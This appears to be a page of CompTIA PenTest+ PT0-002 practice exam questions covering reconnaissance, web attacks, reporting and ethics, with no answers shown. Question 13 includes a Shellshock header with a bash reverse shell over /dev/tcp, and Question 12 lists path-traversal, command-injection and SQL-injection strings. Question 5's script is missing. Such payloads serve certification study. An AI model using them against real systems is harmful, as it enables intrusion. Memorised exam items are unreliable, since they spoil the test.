Winter Sale Limited Time 60% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: 28522818

Home > CompTIA > PenTest+ > PT0-002

PT0-002 CompTIA PenTest+ Certification Exam Question and Answers

Question # 4

A penetration tester would like to obtain FTP credentials by deploying a workstation as an on-path attack between the target and the server that has the FTP protocol. Which of the following methods would be the BEST to accomplish this objective?

A.

Wait for the next login and perform a downgrade attack on the server.

B.

Capture traffic using Wireshark.

C.

Perform a brute-force attack over the server.

D.

Use an FTP exploit against the server.

Full Access
Question # 5

A penetration tester writes the following script:

Which of the following objectives is the tester attempting to achieve?

A.

Determine active hosts on the network.

B.

Set the TTL of ping packets for stealth.

C.

Fill the ARP table of the networked devices.

D.

Scan the system on the most used ports.

Full Access
Question # 6

A penetration tester is attempting to discover live hosts on a subnet quickly.

Which of the following commands will perform a ping scan?

A.

nmap -sn 10.12.1.0/24

B.

nmap -sV -A 10.12.1.0/24

C.

nmap -Pn 10.12.1.0/24

D.

nmap -sT -p- 10.12.1.0/24

Full Access
Question # 7

A penetration tester discovers that a web server within the scope of the engagement has already been compromised with a backdoor. Which of the following should the penetration tester do NEXT?

A.

Forensically acquire the backdoor Trojan and perform attribution

B.

Utilize the backdoor in support of the engagement

C.

Continue the engagement and include the backdoor finding in the final report

D.

Inform the customer immediately about the backdoor

Full Access
Question # 8

A penetration tester wants to perform reconnaissance without being detected. Which of the following activities have a MINIMAL chance of detection? (Choose two.)

A.

Open-source research

B.

A ping sweep

C.

Traffic sniffing

D.

Port knocking

E.

A vulnerability scan

F.

An Nmap scan

Full Access
Question # 9

Which of the following expressions in Python increase a variable val by one (Choose two.)

A.

val++

B.

+val

C.

val=(val+1)

D.

++val

E.

val=val++

F.

val+=1

Full Access
Question # 10

A penetration tester has completed an analysis of the various software products produced by the company under assessment. The tester found that over the past several years the company has been including vulnerable third-party modules in multiple products, even though the quality of the organic code being developed is very good. Which of the following recommendations should the penetration tester include in the report?

A.

Add a dependency checker into the tool chain.

B.

Perform routine static and dynamic analysis of committed code.

C.

Validate API security settings before deployment.

D.

Perform fuzz testing of compiled binaries.

Full Access
Question # 11

A company’s Chief Executive Officer has created a secondary home office and is concerned that the WiFi service being used is vulnerable to an attack. A penetration tester is hired to test the security of the WiFi’s router.

Which of the following is MOST vulnerable to a brute-force attack?

A.

WPS

B.

WPA2-EAP

C.

WPA-TKIP

D.

WPA2-PSK

Full Access
Question # 12

A tester who is performing a penetration test on a website receives the following output:

Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /var/www/search.php on line 62

Which of the following commands can be used to further attack the website?

A.

B.

../../../../../../../../../../etc/passwd

C.

/var/www/html/index.php;whoami

D.

1 UNION SELECT 1, DATABASE(),3--

Full Access
Question # 13

A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code:

exploits = {“User-Agent”: “() { ignored;};/bin/bash –i>& /dev/tcp/127.0.0.1/9090 0>&1”, “Accept”: “text/html,application/xhtml+xml,application/xml”}

Which of the following edits should the tester make to the script to determine the user context in which the server is being run?

A.

exploits = {“User-Agent”: “() { ignored;};/bin/bash –i id;whoami”, “Accept”: “text/html,application/xhtml+xml,application/xml”}

B.

exploits = {“User-Agent”: “() { ignored;};/bin/bash –i>& find / -perm -4000”, “Accept”: “text/html,application/xhtml+xml,application/xml”}

C.

exploits = {“User-Agent”: “() { ignored;};/bin/sh –i ps –ef” 0>&1”, “Accept”: “text/html,application/xhtml+xml,application/xml”}

D.

exploits = {“User-Agent”: “() { ignored;};/bin/bash –i>& /dev/tcp/10.10.1.1/80” 0>&1”, “Accept”: “text/html,application/xhtml+xml,application/xml”}

Full Access
Question # 14

Which of the following describe the GREATEST concerns about using third-party open-source libraries in application code? (Choose two.)

A.

The libraries may be vulnerable

B.

The licensing of software is ambiguous

C.

The libraries’ code bases could be read by anyone

D.

The provenance of code is unknown

E.

The libraries may be unsupported

F.

The libraries may break the application

Full Access
Question # 15

A company that developers embedded software for the automobile industry has hired a penetration-testing team to evaluate the security of its products prior to delivery. The penetration-testing team has stated its intent to subcontract to a reverse-engineering team capable of analyzing binaries to develop proof-of-concept exploits. The software company has requested additional background investigations on the reverse- engineering team prior to approval of the subcontract. Which of the following concerns would BEST support the software company’s request?

A.

The reverse-engineering team may have a history of selling exploits to third parties.

B.

The reverse-engineering team may use closed-source or other non-public information feeds for its analysis.

C.

The reverse-engineering team may not instill safety protocols sufficient for the automobile industry.

D.

The reverse-engineering team will be given access to source code for analysis.

Full Access
Question # 16

A penetration tester ran a ping –A command during an unknown environment test, and it returned a 128 TTL packet. Which of the following OSs would MOST likely return a packet of this type?

A.

Windows

B.

Apple

C.

Linux

D.

Android

Full Access
Question # 17

An assessment has been completed, and all reports and evidence have been turned over to the client. Which of the following should be done NEXT to ensure the confidentiality of the client’s information?

A.

Follow the established data retention and destruction process

B.

Report any findings to regulatory oversight groups

C.

Publish the findings after the client reviews the report

D.

Encrypt and store any client information for future analysis

Full Access
Question # 18

A penetration tester is working on a scoping document with a new client. The methodology the client uses includes the following:

  • Pre-engagement interaction (scoping and ROE)
  • Intelligence gathering (reconnaissance)
  • Threat modeling
  • Vulnerability analysis
  • Exploitation and post exploitation
  • Reporting

Which of the following methodologies does the client use?

A.

OWASP Web Security Testing Guide

B.

PTES technical guidelines

C.

NIST SP 800-115

D.

OSSTMM

Full Access
Question # 19

A company hired a penetration tester to do a social-engineering test against its employees. Although the tester did not find any employees’ phone numbers on the company’s website, the tester has learned the complete phone catalog was published there a few months ago.

In which of the following places should the penetration tester look FIRST for the employees’ numbers?

A.

Web archive

B.

GitHub

C.

File metadata

D.

Underground forums

Full Access
Question # 20

A penetration tester logs in as a user in the cloud environment of a company. Which of the following Pacu modules will enable the tester to determine the level of access of the existing user?

A.

iam_enum_permissions

B.

iam_privesc_scan

C.

iam_backdoor_assume_role

D.

iam_bruteforce_permissions

Full Access
Question # 21

In the process of active service enumeration, a penetration tester identifies an SMTP daemon running on one of the target company’s servers. Which of the following actions would BEST enable the tester to perform

phishing in a later stage of the assessment?

A.

Test for RFC-defined protocol conformance.

B.

Attempt to brute force authentication to the service.

C.

Perform a reverse DNS query and match to the service banner.

D.

Check for an open relay configuration.

Full Access